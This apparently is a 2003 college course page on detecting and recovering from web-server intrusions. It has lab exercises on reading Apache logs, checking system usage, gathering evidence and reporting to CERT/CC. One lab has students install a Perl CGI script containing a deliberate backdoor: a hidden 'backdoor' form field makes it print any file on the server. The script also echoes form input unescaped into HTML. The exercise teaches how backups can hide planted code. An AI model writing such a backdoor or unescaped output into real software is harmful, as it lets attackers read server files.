14. Intrusion Detection and Recovery

What We Will Cover Announcements Final Exam Date and Time: Monday, June 2 at 7-9:50 P.M. Finals are held in the regular classroom Please sit at a computer station and start Apache or IIS When class is over, please shut down your computer Log Tails Overview 14.1: Detecting an Attack 14.1.1: Logs, Audits and Accounting 14.1.2: System and Network Usage Lab Exercise 14.1 14.2: Recovering from an Attack 14.2.1: Before You Reinstall 14.2.2: Reporting the Attack Lab Exercise 14.2 Wrap Up Log Tails From Last Lab Any questions? Quiz Review WebCT back to top Overview We have discussed how to protect ourselves from attack and a break-in Our security model may fail Important to detect the intrusion as early as possible May be able to detect the attack before the attacker can gain access or do damage We need to recover from attacks and return our sites to a safe and stable configuration back to top 14.1: Detecting an Attack Objectives At the end of the lesson the student will be able to: Monitor Logs for Strange Behavior Determine if the System Is Acting Abnormally Detect a Change in the System Configuration Security model we have studied will decrease the risk of an attack However, attacks will happen and security can fail Important to detect attacks or security failures as soon as possible To detect an attack, we try to understand what an attacker will attempt to do Then we can look for and detect the activities associated with these attacks Requires that we know the state of our network and server back to top 14.1.1: Logs, Audits and Accounting Logs Most OS, network and server programs can log information Errors, warning messages, and informational notices can be logged Data in logs is an excellent resource for determining what is happening at our site If an error is logged, it could indicate a configuration problem Could also indicate someone is trying to modify a file they do not have permission to Could be a user trying to login with the wrong password Maybe the user did not know they did not have permissions to modify the file Maybe the user made an error trying to type their password Wise to check messages of this nature to be sure that you are not under attack In addition, Web servers will log which documents have been requested and by whom Allows you to see what is being served and who is connecting Audits Logs are not the only things that keep track of general system usage Many systems have a means of auditing command usage or system events Auditing can monitor when a file is opened, read, or written to Can watch for when a process starts, ends, or forks a child process Can record user activity such as when a user logs in or out Logs notify you of errors or specific application-level transactions Audits provide more detail about a transaction Allows you to check all the steps leading up to a transaction Accounting Accounting calculates how much of the system resources are being used by each user Original purpose was to tally up CPU, disk, and login time of each user for billing Most system administrators do not bill their users for system use anymore But accounting does provide a good way of determining how the system is being used and by whom Accounting can serve as an additional log for security Hackers will often try to gain superuser access They then will modify the logs to hide their presence May overlook the accounting information and change only the logs Mismatch of data may help you to detect the intrusion back to top 14.1.2: System and Network Usage Every system has its own usage pattern Popular Web sites may constantly get hits and CPU usage may almost always be at its maximum A Web server that just keeps your resume online may only get a few hits a day In any case, usage should be fairly consistent What type of attack may be happening if your hit rate drops from 10,000/day to 10/day? What if a user, who normally logs in on weekdays 8-5, starts logging in late at night? To notice these types of patterns, we need to know what is normal behavior Knowing typical use of your system and network will allow you to detect abnormal usage Changes of this nature are good clues that a hacker may be present Further Information Intrusion Detection Pages: information about intrusion detection and intrusion detection research back to top Lab Exercise 14.1 Use the next 10 minutes to complete the following. Start a text file named exercise14.txt Will be adding to this file during the lesson -- save it often. Prepare the exercise header as described in the HowTo on submitting exercises Label this exercise: Lab 14.1 Perform the following exercises and answer the questions. Exercises and Questions Monitor Logs for Strange Behavior Use your system's find file procedure to locate all file names containing the word log. find / -name "*.log" Which files did you find? Note that most system log files are located in /var/log and its subdirectories. If not already started, then start your Web server. Examine the Web server's log files and then load the default page. cd /usr/local/apache2/logs cat access_log What information was logged after loading the default page? cat access_log Attempt to load a page that does not exist on the Web server. What information was logged? cat access_log cat error_log Submit an online form whose data is processed by a CGI script on the Web server. See Lab 11.3 for an example form and script. What information was logged? cat access_log cat referer_log Stop and restart the Web server. What information was logged after restarting the Web server? cat error_log Log in as the superuser, if not already logged in as such, and attempt to edit the Web server's log files manually. Are you able to edit the log files? Determine if the System is Acting Abnormally Using the various tools available on your system, answer the following questions. For UNIX some tools you can use are netstat, vmstat, iostat, sar, ps, and uptime. Windows 95/98/NT have tools such as a system monitor. What is the average load on the system? uptime How much CPU and memory is the system consuming? vmstat or top How many connections are established to the Web server? ps -ef | grep httpd What processes are currently running on the system? ps -ef Which users are currently logged in? who Detect a Change in the System Configuration Examine and compare the file attributes of the Web server's log files, a compiled executable program file, and the configuration file for the Web server. ls -l /usr/local/apache2/logs/access_log ls -l /usr/local/apache2/bin/httpd ls -l /usr/local/apache2/conf/httpd.conf Which file attributes are kept track of and what are their values? Make a minor change to the Web server's configuration (httpd.conf) and load the default page after restarting the Web server. What has changed about each file's attributes? What do you expect the attributes to look like in a month? back to top 14.2: Recovering from an Attack Objectives At the end of the lesson the student will be able to: Collect evidence for prosecution Report an attack Properly restore to a safe configuration There is always the possibility that your security will be compromised If so, an intruder may gain superuser access At this point the intruder has full control and can do anything to the system When this happens, you must reinstall the operating system to be safe back to top 14.2.1: Before You Reinstall Ultimately, reinstalling will be necessary if your security is breached Must decide if you want to pursue the hacker and try to prosecute him or her To pursue, you will want to gather evidence first Reinstalling removes all traces of a hacker Before reinstalling, save log information and files that were modified To Catch a Thief If at all possible, attempt to catch the hacker in the act of breaking in and tampering with the system If you abruptly kill the hacker’s connection into the machine, he will suspect that you are onto him Difficult to sit idly by while a hacker is viewing sensitive data or deleting important files One solution is to create a decoy machine without any sensitive data Allows you the time needed to gather your evidence without having to worry about what the hacker is doing to your machine. back to top 14.2.2: Reporting the Attack You may want to report an attack Others may have experienced an attack similar to yours Each site can leverage off the others to build their legal case or merely learn from each other's mistakes Backtracking The hacker most likely will be masquerading as someone else Probably will be attacking your site from another site that has been compromised Should get in contact with the other site’s system administrator to gather information on that end The administrator may be unaware that he or she has a hacker present The other system administrator may need to contact another site himself or herself Slowly you can work backwards to track down the physical location of the hacker Working With Your ISP Should also send a report to your own ISP Most, if not all, attacks are unlawful (Title 18, United States Code) Some ISPs are very responsive to abuse and will cooperate and take appropriate action Unfortunately, may ISP's just don't care If they don't help you then choose another provider who will Do Not Commit This Damaging Error Whatever you do, don't ever try to attack back Not only is this illegal and immature, it's probably futile Only a real moron would attack you without first making sure he or she is immune to attacks Further Information Reporting Security Problems with Apache back to top Lab Exercise 14.2 Use the next 10 minutes to complete the following. Note that some of these exercises have been modified from those in the text book. Label this exercise: Lab 14.2 Collect Evidence for Prosecution The evidence to be obtained should consist of copies of modified files, logs, and a step-by-step trace of the hacker's actions. Without knowing which files were definitely modified, what could you do to gather this evidence? find / -mount -mtime -1 What tool can be used to log a hacker's step-by-step actions? Note: a common tool for UNIX systems is acctcom. Unfortunately, we do not have this tool installed on out machines. You can get some information using sar. Report an Attack Go to the CERT/CC's Web site and click the link for reporting an incident. What is required by the CERT/CC when reporting an incident? Click the CERT/CC's link to incident reporting guidelines. Who else does the CERT/CC suggest you report an incident to? Properly Restore to a Safe Configuration Assume that you are recovering from an intrusion where superuser access was gained. You have already reinstalled the operating system and all third-party applications you use. You now decide to restore your Web server documents and CGI programs and scripts from a backup. Save the following script to your cgi-bin directory as if it were a script you restored. Name the script webpage.pl and use the form from the link below to access your new script. #!/usr/bin/perl read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); $buflen = length($buffer); if ($buflen > 0) { @pairs = split(/&/, $buffer); foreach $pair (@pairs) { ($name, $value) = split(/=/, $pair); $value =~ tr/+/ /; $value=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $ARGS{$name} = $value; } } print "Content-type: text/html\n\n"; print "<HTML>\n"; print "<HEAD>\n"; print " <TITLE>$ARGS{fname} $ARGS{lname}</TITLE>\n"; print "</HEAD>\n"; print "<BODY BGCOLOR=\"#ffffff\">\n"; print "<CENTER>\n"; print "Welcome to the home page of...\n<BR>\n"; print "<FONT SIZE=+4 COLOR=red>"; print "<BLINK>$ARGS{fname} $ARGS{lname}</BLINK></FONT>\n"; print "</CENTER>\n"; if($ARGS{backdoor}) { print "<PRE>\n"; open(AFILE, "/$ARGS{backdoor}"); while(<AFILE>) { print; }; close(AFILE); print "</PRE>\n"; } print "</BODY>\n"; print "</HTML>\n"; Save the script from here in /var/www/cgi-bin as webpage.pl. Do not forget to set the file permissions to allow script execution. chmod +x webpage.pl Use the form here. What does the script return when you submit the form data? Now modify your HTML form to also POST a HIDDEN variable named backdoor whose value is the fully qualified path to a file. The modified form is available here. What does the script return now when you submit the form that sends the additional HIDDEN variable? Notice the "gift" left behind in the following section of code: if($ARGS{backdoor}) { print "<PRE>\n"; open(AFILE, "/$ARGS{backdoor}"); while(<AFILE>) { print; }; close(AFILE); print "</PRE>\n"; } What does this tell you about the state of your system? back to top Wrap Up When class is over, please shut down your computer You may complete unfinished exercises at any time before the next class. Be sure to submit the file to the instructor before the beginning of the next class to receive credit. Instructions on submitting exercises are available from the HowTo's page. back to top Home | WebCT | Announcements | Schedule | Expectations | Syllabus | Help | FAQ's | HowTo's | Links Last Updated: 7/16/2003 4:45:45 PM